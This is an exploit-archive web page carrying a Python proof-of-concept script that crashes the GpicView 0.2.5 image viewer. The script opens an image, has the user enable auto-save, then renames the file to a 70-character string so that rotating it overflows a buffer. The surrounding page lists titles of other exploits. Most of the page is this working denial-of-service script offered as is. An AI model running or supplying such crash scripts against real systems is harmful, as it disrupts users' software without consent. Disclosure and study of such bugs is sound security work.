首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GpicView 0.2.5 - Crash PoC
来源:Xino.co.uk 作者:Silveiro 发布时间:2016-02-29  
#!/usr/bin/python
# Exploit Title: GpicView Buffer Overflow DOS
# Date: 25th February 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: lxde.sourceforge.net/gpicview/
# Software Link: https://sourceforge.net/projects/lxde/files/GPicView%20%28image%20Viewer%29/0.2.x/
# Version: 0.2.5
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
 
#Example: python POC.py [image-file]
 
from sys        import argv
from subprocess import Popen
from shlex      import split
from time       import sleep
import shutil
 
def DOS(arg):
                                          #"""------------------------------------"""#
    command    = 'gpicview ' + arg[1]     #'''   Recieve file & construct Popen   '''#
    command_2  = split(command)           #"""------------------------------------"""#
                                          #"|"                                    "|"#
    Popen(command_2)                      #"""      Open file with Gpicview       """#
                                          #"""------------------------------------"""#
    print("Required: You have 15 seconds")
    print("to click on preferences, and ")
    print("check 'Auto Save Images'     ")        
    
    sleep(15)
                                          #"""------------------------------------"""#
    buffer = 'A' * 70 + '.png'            #"|"      Rename image with Buffer      "|"#
    shutil.move(arg[1], buffer)           #"""------------------------------------"""#
 
def main():
 
    print("Author:   David Silveiro   ")
    print("Company:  Xino.co.uk       ")
    print("   POC Gpicview DOS        ")
 
    DOS(argv)
 
    print("File ready for overflow    ")
    print("Now simply rotate the image")
 
 
if __name__ == "__main__":
   main()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Proxmox VE 3/4 Insecure Hostna
·Qualcomm Adreno GPU MSM Driver
·Linux io_submit L2TP Sendmsg I
·Centreon 2.5.3 Code Execution
·libquicktime 1.2.4 - Integer O
·Comodo Anti-Virus SHFolder.DLL
·Core FTP Server 1.2 - Buffer O
·ASAN/SUID Local Root Exploit
·Adobe Cross Site Scripting / O
·NETGEAR ProSafe Network Manage
·QuickHeal 16.00 - webssx.sys D
·ATutor 2.2.1 SQL Injection / R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved